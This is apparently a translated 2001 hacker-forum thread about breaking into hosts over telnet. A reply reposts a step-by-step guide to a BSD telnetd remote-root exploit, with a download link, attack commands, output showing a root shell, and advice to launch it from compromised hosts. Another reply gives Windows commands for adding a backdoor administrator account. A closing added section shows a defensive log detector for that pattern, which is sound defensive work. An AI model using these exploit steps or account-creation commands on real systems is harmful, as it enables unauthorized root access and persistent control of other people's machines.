Subject: TELNET intrusion!!!

风狼
Unregistered

Hello: I used the TELNET command, but all I saw was a piece of text. Can that text be used to get the password? What should I do??

IP: Logged

瑞火
Unregistered

> On 7/24 the virtual host on which the Honker Union (红客联盟) website is hosted was hacked;
> the real cause was the remote overflow vulnerability in *bsd telnetd.
>
> Affected systems:
> BSDI BSD/OS 4.0.1
> BSDI BSD/OS 4.0
> FreeBSD FreeBSD 5.0
> FreeBSD FreeBSD 4.3
> FreeBSD FreeBSD 4.2
> FreeBSD FreeBSD 4.1.1
> FreeBSD FreeBSD 4.1
> FreeBSD FreeBSD 4.0
> FreeBSD FreeBSD 3.x
> FreeBSD FreeBSD 2.x
> NetBSD NetBSD 1.5.1
> NetBSD NetBSD 1.5
> NetBSD NetBSD 1.4.3
> NetBSD NetBSD 1.4.2
> NetBSD NetBSD 1.4.1
> NetBSD NetBSD 1.4
> NetBSD NetBSD 1.3.3
> NetBSD NetBSD 1.3.2
> NetBSD NetBSD 1.3.1
> NetBSD NetBSD 1.3
> NetBSD NetBSD 1.2.1
> NetBSD NetBSD 1.2
> NetBSD NetBSD 1.1
> NetBSD NetBSD 1.0
> Netkit Linux Netkit 0.12
> Netkit Linux Netkit 0.11
> Netkit Linux Netkit 0.10
> OpenBSD OpenBSD 2.8
> OpenBSD OpenBSD 2.7
> OpenBSD OpenBSD 2.6
> OpenBSD OpenBSD 2.5
> OpenBSD OpenBSD 2.4
> OpenBSD OpenBSD 2.3
> OpenBSD OpenBSD 2.2
> OpenBSD OpenBSD 2.1
> OpenBSD OpenBSD 2.0
> SGI IRIX 6.5
> Sun Solaris 8.0
> Sun Solaris 7.0
> Sun Solaris 2.6
>
> More systems may yet be found to be affected by this vulnerability.
>
> An exploit is now circulating on the net. It targets *bsd,
> tested: FreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE
> NetBSD 1.5
> BSDI BSD/OS 4.1
> I have now compiled it so that it can run under Windows.
>
> Usage:
> 1. Extract the files in the package into the same directory
>
> 2. Run bsd.exe to see the run options.
> ====================================================
> + Compiled by http://www.cnhonker.com lion +
> + Have a goodluck! +
> ====================================================
>
> 7350854 - x86/bsd telnetd remote root
> by zip, lorian, smiler and scut.
>
> usage: bsd [-n <num>] [-c] [-f] <ip>
>
> -n num number of populators, for testing purposes
> -c check exploitability only, do not exploit
> -f force mode, override check results
>
> WARNING: this is no easy exploit, we have to get things tightly aligned and
> send 16/34mb of traffic to the remote telnet daemon. it might not be able to
> take that, or it will take very long for it (> 1h). beware.
>
> tested: FreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE
> NetBSD 1.5
> BSDI BSD/OS 4.1
>
>
> C:\>
>
> 3. Test whether the target host has the telnetd vulnerability
> C:\>bsd -c 202.108.*.*
> ====================================================
> + Compiled by http://www.cnhonker.com lion +
> + Have a goodluck! +
> ====================================================
>
> 7350854 - x86/bsd telnetd remote root
> by zip, lorian, smiler and scut.
>
> check: PASSED, using 16mb mode
>
> 4. Attack the target system
> C:\>bsd -f 202.108.*.*
> ====================================================
> + Compiled by http://www.cnhonker.com lion +
> + Have a goodluck! +
> ====================================================
>
> 7350854 - x86/bsd telnetd remote root
> by zip, lorian, smiler and scut.
>
> check: PASSED, using 16mb mode
>
> #############################################################################
>
> ok baby, times are rough, we send 16mb traffic to the remote
> telnet daemon process, it will spill badly. but then, there is no
> other way, sorry...
>
> ## setting populators to populate heap address space
> ## number of setenvs (dots / network): 31500
> ## number of walks (percentage / cpu): 496140750
> ##
> ## the percentage is more realistic than the dots ;)
> percent |--------------------------------------------------------| ETA |
> 99.37% |....................................................... | 00:00:00 |
>
> ## sleeping for 10 seconds to let the process recover
> ## ok, you should now have a root shell
> ## as always, after hard times, there is a reward...
>
>
> command: ?id
> uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator),
> 20(staff), 31(guest)
> uname -a
> FreeBSD ***.***.com 3.5.1-RELEASE FreeBSD 3.5.1-RELEASE #0: Tue Oct 31 20:05:46
> CST 2000 ding@***.***.com :/usr/src/sys/compile/DING i386
>
>
> Overflow succeeded!
>
> 5. Because this exploit needs to send 16M of packets to overflow one machine, please run it
> from a compromised host with high bandwidth and wait patiently for a few minutes. Please test
> the target system with the -c option before use. If it shows check: PASSED, using
> 16mb mode, the vulnerability is present; otherwise it shows FAILED.
>
> 6. Please use this program properly; any illegal intrusion has nothing to do with me. by: lion 2001/7/27

Download address: http://home.dqt.com.cn/~safeinfo/bsdhacking.zip
Please use with caution. Testing the tool against domestic sites is prohibited!

[Edited by 瑞火 (date 07-30-2001)]

IP: Logged

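风狼
Unregistered

Hello: I know this method of yours!! I have that software too. What I mean is without using this kind of software: I can log in to his host, but once I am on his machine I have no way of getting his password! Could you tell me a better method? Thanks!!

Let's start working toward our goal and build our own digital team!! Corps!!
Nothing is impossible!
No mission is impossible!
I keep working at it!

IP: Logged
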
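网络之隼
Unregistered

Friend above, if your login has system privileges, you can create a user yourself and add it to administrators; then you don't need to crack his password.

net user username password /add
net localgroup administrators username /add

IP: Logged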
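
Seen from the defender's side, the two commands in the last reply leave a recognisable pair in process-creation logs: an account is created, then added to the local Administrators group on the same host. The following is an added example, not part of the thread, that correlates the two; the record layout (timestamp, host, command line), the host names and the account names are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample records: (timestamp, host, command line). Layout is an assumption.
SAMPLE_EVENTS = [
    ("2024-03-01 10:00:05", "WEB01", "net user"),
    ("2024-03-01 10:02:11", "WEB01", "net user svc_backup Passw0rd /add"),
    ("2024-03-01 10:02:40", "WEB01", "NET.EXE  localgroup Administrators svc_backup /ADD"),
    ("2024-03-01 11:15:00", "DB02", r"C:\Windows\System32\net1.exe localgroup administrators alice /add"),
    ("2024-03-01 12:00:00", "WEB01", "net localgroup administrators"),
]

# net / net1, optional path, optional .exe, optional surrounding quote.
NET = r'^\s*"?(?:\S*\\)?net1?(?:\.exe)?"?\s+'
USER_ADD = re.compile(NET + r"user\s+(\S+)(?:\s+\S+)?\s+/add\b", re.I)
GROUP_ADD = re.compile(NET + r'localgroup\s+"?administrators"?\s+(\S+)\s+/add\b', re.I)


def find_admin_account_creation(events, window=timedelta(hours=1)):
    """Return (host, user, created_at, promoted_at) for every account that is
    created and then added to Administrators on the same host within `window`."""
    parsed = sorted((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), host, cmd)
                    for ts, host, cmd in events)
    created = {}  # (host, user) -> time the account was created
    alerts = []
    for when, host, cmd in parsed:
        m = USER_ADD.match(cmd)
        if m:
            created[(host.lower(), m.group(1).lower())] = when
            continue
        m = GROUP_ADD.match(cmd)
        if m:
            key = (host.lower(), m.group(1).lower())
            if key in created and when - created[key] <= window:
                alerts.append((host, m.group(1), created[key], when))
    return alerts


if __name__ == "__main__":
    for host, user, made, promoted in find_admin_account_creation(SAMPLE_EVENTS):
        print(f"{host}: '{user}' created {made} and made administrator {promoted}")
```

On Windows the same pairing is also recorded as Security events 4720 (user account created) and 4732 (member added to a security-enabled local group). A group addition with no matching creation, like the DB02 record, is not flagged by this pairing rule and would need its own review.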